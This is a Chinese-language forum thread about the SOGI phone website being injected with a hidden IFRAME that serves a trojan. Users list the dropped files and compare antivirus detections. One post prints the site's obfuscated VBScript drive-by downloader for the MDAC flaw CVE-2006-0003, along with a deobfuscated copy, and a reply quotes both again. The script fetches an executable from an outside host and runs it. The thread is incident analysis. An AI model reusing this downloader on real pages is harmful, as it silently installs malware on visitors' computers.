手機王又被植入木馬了

[hcchen]

[PHP]
<IFRAME src="http://www.myemage.com/V20/Daren/images/***.***" width=0 height=0></IFRAME>
[/PHP]


會經由該網頁下載檔案svchost.exe並執行。
但是會出現svchost.exe並不是標準的32位元應用程式，然後跟著下載2.exe
該木馬的目的:未知
那怎麼知道自己中標了:
檢查C:\Documents and Settings\使用者名稱\Local Settings\Temp下是否有
svchost.exe
檔案大小：59.0 KB (60,468 位元組)

檢查C:\Documents and Settings\使用者名稱\Local Settings\Temporary Internet Files下是否有

2.exe
檔案大小：59.0 KB (60,468 位元組)

會在C:\WINDOWS\system32下產生
gfile.dll、goodfile.exe 2個檔案

---------------------------------------------------------------------
總之，近期上手機王的自己小心了............

[fq4lxx92]

還好我都是用狐狸瀏覽，一步步將2.exe抓下來，卡巴6.0.1.408 2006/10/29 10:45:45 抓不到 ，但是....看圖就知道。

[DarkSkyline]

連到 www.sogi.com.tw 會自動下載 gfile.dll 到c:\windows\system32\資料夾底下, AntiVir PersonalEdition Premium找到"HEUR/Malware"病毒,請大家測試一下自己的防毒軟體....^_^

[BitDefender]

BitDefender Antivirus v10找到病毒
Infected: Dropped:Generic.Lineage.06B7FB77

[琥珀]

2000 的 IE6 完全沒有反應？在 system32 和 temp 目錄沒有找到上述的檔案。

[esjustin]

Mcafee 的未知防禦技術可以偵測到喔~

用FF可以防止中毒...

[haol]

2.exe
卡巴更新真快
已偵測為Trojan-PSW.Win32.OnLineGames.as


F-Prot 3.16f 10.28.2006 Possibly a new variant of W32/Threat-IKNP-based!Maximus

對了f-secure不是有F-Prot的引擎嗎，當kav尚未更新時
f-secure的f-Prot能以啟發式抓到嗎?

f-secure的使用者能試試..........

[haol]

f-secure "online scanner"2.1似乎不行 ........
(f-secure的更新跟kav有時差?!> <，而f-secure的f-Pro也..........)

[hcchen]

Microsoft Windows MDAC 漏洞 - CVE-2006-0003：

作爲 ActiveX 數據對象 (ADO) 的一部分提供並在 MDAC 中分發的
RDS.Dataspace ActiveX 控件中存在一個遠程代碼執行漏洞。 成功利用此漏
洞的攻擊者可以完全控制受影響的系統。以下爲使用此漏洞通過網頁散播木馬
--------------------------------------------------------------------------
手機王網頁木馬原始碼:
[PHP]

<script language="VBScript">
on error resume next

dl="http://www.myemage.com/V20/Daren/images/*.exe"
j1="clsid:"
j2="BD96"
j3="C556-"
j4="65A3-"
j5="11D0-"
j6="983A-"
j7="00C04FC29E36"
j8=j1&j2&j3&j4&j5&j6&j7
xx="object"
xxx="classid"
xxxx="Scripting.FileSystemObject"
dd="open"
Set df = document.createElement(xx)
df.setAttribute xxx, j8
b4="Mi"
b5="cr"
b6="o"
b7="soft"
b8=".X"
b9="M"
b10="L"
b11="H"
b12="T"
b13="T"
b14="P"
strb1=b4&b5&b6&b7&b8&b9
strb2=b10&b11&b12&b13&b14
strb=strb1&strb2
Set x = df.CreateObject(strb,"")
a4="A"
a5="d"
a6="o"
a7="d"
a8="b"
a9="."
a10="S"
a11="t"
a12="r"
a13="e"
a14="a"
a15="m"
strd1=a4&a5&a6&a7&a8&a9
strd2=a10&a11&a12&a13&a14&a15
strd=strd1&strd2
set SS = df.createobject(strd,"")
SS.type = 1
f4="G"
f5="E"
f6="T"
stre=f4&f5&f6
x.Open stre, dl, False
x.Send
marco1="svchost.exe"
set F = df.createobject(xxxx,"")
tmp2=2
set tmp = F.GetSpecialFolder(tmp2)
SS.open
marco1= F.BuildPath(tmp,marco1)
SS.write x.responseBody
SS.savetofile marco1,2
SS.close
z1="She"
z2="ll.A"
z3="ppli"
z4="cat"
z5="io"
z6="n"
zz=z1&z2&z3&z4&z5&z6
set Q = df.createobject(zz,"")
Q.ShellExecute marco1,"","",dd,0
</script>

[/PHP]

還原:
[PHP]
<script language="VBScript">
on error resume next

dl="http://www.myemage.com/V20/Daren/images/*.exe"

j8="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"

xx="object"
xxx="classid"

dd="open"

Set df = document.createElement(xx)

df.setAttribute xxx, j8

strb="Microsoft.XMLHTTP"
Set x = df.CreateObject(strb,"")

strd="Adodb.Stream"
set SS = df.createobject(strd,"")

SS.type = 1
stre="GET"
x.Send

marco1="svchost.exe"
set F = df.createobject(xxxx,"")


tmp2=2
set tmp = F.GetSpecialFolder(tmp2)


SS.open
marco1= F.BuildPath(tmp,marco1)

SS.write x.responseBody
SS.close


zz="Shell.Application"
set Q = df.createobject(zz,"")
Q.ShellExecute marco1,"","",dd,0


</script>
[/PHP]

http://www.microsoft.com/taiwan/tech.../MS06-014.mspx

[hwwgo]

引用:

作者: hcchen

Microsoft Windows MDAC 漏洞 - CVE-2006-0003：

作爲 ActiveX 數據對象 (ADO) 的一部分提供並在 MDAC 中分發的
RDS.Dataspace ActiveX 控件中存在一個遠程代碼執行漏洞。 成功利用此漏
洞的攻擊者可以完全控制受影響的系統。以下爲使用此漏洞通過網頁散播木馬
--------------------------------------------------------------------------
手機王網頁木馬原始碼:
[PHP]

<script language="VBScript">
on error resume next

dl="http://www.myemage.com/V20/Daren/images/*.exe"
j1="clsid:"
j2="BD96"
j3="C556-"
j4="65A3-"
j5="11D0-"
j6="983A-"
j7="00C04FC29E36"
j8=j1&j2&j3&j4&j5&j6&j7
xx="object"
xxx="classid"
xxxx="Scripting.FileSystemObject"
dd="open"
Set df = document.createElement(xx)
df.setAttribute xxx, j8
b4="Mi"
b5="cr"
b6="o"
b7="soft"
b8=".X"
b9="M"
b10="L"
b11="H"
b12="T"
b13="T"
b14="P"
strb1=b4&b5&b6&b7&b8&b9
strb2=b10&b11&b12&b13&b14
strb=strb1&strb2
Set x = df.CreateObject(strb,"")
a4="A"
a5="d"
a6="o"
a7="d"
a8="b"
a9="."
a10="S"
a11="t"
a12="r"
a13="e"
a14="a"
a15="m"
strd1=a4&a5&a6&a7&a8&a9
strd2=a10&a11&a12&a13&a14&a15
strd=strd1&strd2
set SS = df.createobject(strd,"")
SS.type = 1
f4="G"
f5="E"
f6="T"
stre=f4&f5&f6
x.Open stre, dl, False
x.Send
marco1="svchost.exe"
set F = df.createobject(xxxx,"")
tmp2=2
set tmp = F.GetSpecialFolder(tmp2)
SS.open
marco1= F.BuildPath(tmp,marco1)
SS.write x.responseBody
SS.savetofile marco1,2
SS.close
z1="She"
z2="ll.A"
z3="ppli"
z4="cat"
z5="io"
z6="n"
zz=z1&z2&z3&z4&z5&z6
set Q = df.createobject(zz,"")
Q.ShellExecute marco1,"","",dd,0
</script>

[/PHP]

還原:
[PHP]
<script language="VBScript">
on error resume next

dl="http://www.myemage.com/V20/Daren/images/*.exe"

j8="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"

xx="object"
xxx="classid"

dd="open"

Set df = document.createElement(xx)

df.setAttribute xxx, j8

strb="Microsoft.XMLHTTP"
Set x = df.CreateObject(strb,"")

strd="Adodb.Stream"
set SS = df.createobject(strd,"")

SS.type = 1
stre="GET"
x.Send

marco1="svchost.exe"
set F = df.createobject(xxxx,"")


tmp2=2
set tmp = F.GetSpecialFolder(tmp2)


SS.open
marco1= F.BuildPath(tmp,marco1)

SS.write x.responseBody
SS.close


zz="Shell.Application"
set Q = df.createobject(zz,"")
Q.ShellExecute marco1,"","",dd,0


</script>
[/PHP]

怎麽才能做到還原的？